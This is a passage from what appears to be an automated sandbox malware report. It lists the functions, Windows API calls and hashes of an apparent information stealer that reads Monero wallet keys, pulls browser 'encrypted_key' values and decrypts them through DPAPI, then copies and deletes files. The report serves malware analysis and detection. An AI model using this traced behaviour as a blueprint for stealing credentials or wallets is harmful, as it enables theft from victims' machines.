                                    • Opcode Fuzzy Hash: b2328baaa6d5b17abdc855fa0641082abb76873729ef4da865269a5924a51822
                                    • Instruction Fuzzy Hash: 18E1BB72D101489ACB14EBA5DDA2EEE77BDAF24300F5185D9F11672191EF307A4CCB62
                                    Function 00BDD500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDD581
                                    • lstrlen.KERNEL32(00000000), ref: 00BDD798
                                    • lstrlen.KERNEL32(00000000), ref: 00BDD7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDD82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 9d489d7472c66f5550ad01bb1d6250ff485be0cbc896339ec61dd86591ca42e6
                                    • Instruction ID: 657af60084e81f562186007e1df502d4edc014f92cc86a9ea6d5aa339ed8084c
                                    • Opcode Fuzzy Hash: 9d489d7472c66f5550ad01bb1d6250ff485be0cbc896339ec61dd86591ca42e6
                                    • Instruction Fuzzy Hash: C891DC72D101489BCB14EBB5DDA2EEE77BDAF64300F5185E9F11662191EF307A08CB62
                                    Function 00BDD880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BE8CF0: GetSystemTime.KERNEL32(00BF0E1B,018BA148,00BF05B6,?,?,00BD13F9,?,0000001A,00BF0E1B,00000000,?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BE8D16
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BDD901
                                    • lstrlen.KERNEL32(00000000), ref: 00BDDA9F
                                    • lstrlen.KERNEL32(00000000), ref: 00BDDAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 00BDDB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 1046845ad1af2080204d8b99ad0e50bbc4062c23ce76628b8841a8261530e28b
                                    • Instruction ID: ed0bc08c51d1a8b85077436dcbb1ac6df42ec8e8504f3471ccbeb0a934ad980d
                                    • Opcode Fuzzy Hash: 1046845ad1af2080204d8b99ad0e50bbc4062c23ce76628b8841a8261530e28b
                                    • Instruction Fuzzy Hash: F881DE72D101489BCB04FBB5DCA2EEE77BDAF64300F5145A9F51662191EF347A08CB62
                                    Function 00C4FED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: 4f88339c58c3cac235467a4c120949d0c79a250200520a1c9bae18294583363b
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: 54510176A00206AFFB288F94C841BBA77E4FF41301F24452DEC1587691E731EE89EB90
                                    Function 00BDA560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BDA664
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: 3f89f7ea8d12ab44798c07398685c87d00b2cd1566096de7e3a53fe09affca52
                                    • Instruction ID: d4bf9e2098cede9d7d10faa05b7b3133f4c7a7c55c78638cfa927abf4627f114
                                    • Opcode Fuzzy Hash: 3f89f7ea8d12ab44798c07398685c87d00b2cd1566096de7e3a53fe09affca52
                                    • Instruction Fuzzy Hash: 5B514A70A1024CEFDB14EFA8DD95FEDB7F9AF54304F008558E90A6B291EB706A04CB52
                                    Function 00BDF5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00BEAAF6
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                      • Part of subcall function 00BEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BEAC82
                                      • Part of subcall function 00BEAC30: lstrcat.KERNEL32(00000000), ref: 00BEAC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00BF1678,00BF0D93), ref: 00BDF64C
                                    • lstrlen.KERNEL32(00000000), ref: 00BDF66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 42590fdea5e78a3977f6ad28f57b5e23cbde27f90c2c0116ae9b63743f4b12d3
                                    • Instruction ID: 4cce96d0a74fe79e545dd38574bf89d142202fe2555fa5dd1ce3257444f3190d
                                    • Opcode Fuzzy Hash: 42590fdea5e78a3977f6ad28f57b5e23cbde27f90c2c0116ae9b63743f4b12d3
                                    • Instruction Fuzzy Hash: 2D511B72D00248AACB14FBB5DDA29FD77BDAF54300F4189A8F51667191EF347A08CB62
                                    Function 00BE37B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 49debfd61d8e400dac7f808360e592771998df4f3e08bca02e2b7dbda7736a55
                                    • Instruction ID: e1c98fcf4e6f9a8f78ca3e2177f787608656d06b70c84c49a95d74f3bf82c111
                                    • Opcode Fuzzy Hash: 49debfd61d8e400dac7f808360e592771998df4f3e08bca02e2b7dbda7736a55
                                    • Instruction Fuzzy Hash: 37413075D102499BCB04EFA6D895AFEB7F8AF58704F008098F51677191EB74AA08CFA1
                                    Function 00BDA430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                      • Part of subcall function 00BDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BDA13C
                                      • Part of subcall function 00BDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BDA161
                                      • Part of subcall function 00BDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00BDA181
                                      • Part of subcall function 00BDA110: ReadFile.KERNEL32(000000FF,?,00000000,00BD148F,00000000), ref: 00BDA1AA
                                      • Part of subcall function 00BDA110: LocalFree.KERNEL32(00BD148F), ref: 00BDA1E0
                                      • Part of subcall function 00BDA110: CloseHandle.KERNEL32(000000FF), ref: 00BDA1EA
                                      • Part of subcall function 00BE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BE8FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BDA489
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA23F
                                      • Part of subcall function 00BDA210: LocalAlloc.KERNEL32(00000040,?,?,?,00BD4F3E,00000000,?), ref: 00BDA251
                                      • Part of subcall function 00BDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BD4F3E,00000000,00000000), ref: 00BDA27A
                                      • Part of subcall function 00BDA210: LocalFree.KERNEL32(?,?,?,?,00BD4F3E,00000000,?), ref: 00BDA28F
                                      • Part of subcall function 00BDA2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BDA2D4
                                      • Part of subcall function 00BDA2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00BDA2F3
                                      • Part of subcall function 00BDA2B0: LocalFree.KERNEL32(?), ref: 00BDA323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: fc1bd714d221c6a6b34a447eac788ff586d9274065fb3dc3ff636cf5dc016568
                                    • Instruction ID: 50b78748d00ffccc740b499d8dff89a7c8d0db7e2f59b46f86a1ee29655d53e9
                                    • Opcode Fuzzy Hash: fc1bd714d221c6a6b34a447eac788ff586d9274065fb3dc3ff636cf5dc016568
                                    • Instruction Fuzzy Hash: 2A3145B5D00509ABCF14EFE4EC45AEEB7F8AF68304F044599E505A3241F7359A04CBA2
                                    Function 00BE8810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00BEAA50: lstrcpy.KERNEL32(00BF0E1A,00000000), ref: 00BEAA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BF05BF), ref: 00BE885A
                                    • Process32First.KERNEL32(?,00000128), ref: 00BE886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 00BE8883
                                      • Part of subcall function 00BEACC0: lstrlen.KERNEL32(?,018B9000,?,\Monero\wallet.keys,00BF0E1A), ref: 00BEACD5
                                      • Part of subcall function 00BEACC0: lstrcpy.KERNEL32(00000000), ref: 00BEAD14
                                      • Part of subcall function 00BEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BEAD22
                                      • Part of subcall function 00BEABB0: lstrcpy.KERNEL32(?,00BF0E1A), ref: 00BEAC15
                                    • CloseHandle.KERNEL32(?), ref: 00BE88F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000EA6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000000EBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.000000000114D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001154000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752671866.0000000001164000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752945758.0000000001165000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753067903.0000000001307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1753084461.0000000001308000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_bd0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 4d2b048063d8b585fa6186e1a13909a3f57233a72884b22decfe4a3b48d3557d
                                    • Instruction ID: 6b9fa60c03269b6f77919d23e4939435aad3f7e358670471abe1685909954393
                                    • Opcode Fuzzy Hash: 4d2b048063d8b585fa6186e1a13909a3f57233a72884b22decfe4a3b48d3557d
                                    • Instruction Fuzzy Hash: BC312A71901258ABCB24EBA6CD51BEEB7BCEB55700F1041D9F50AA61A0DB306A48CFA1
                                    Function 00C4FDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C4FE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C4FE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1752429326.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                    • Associated: 00000000.00000002.1752405351.0000000000BD0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000BD1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1752429326.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
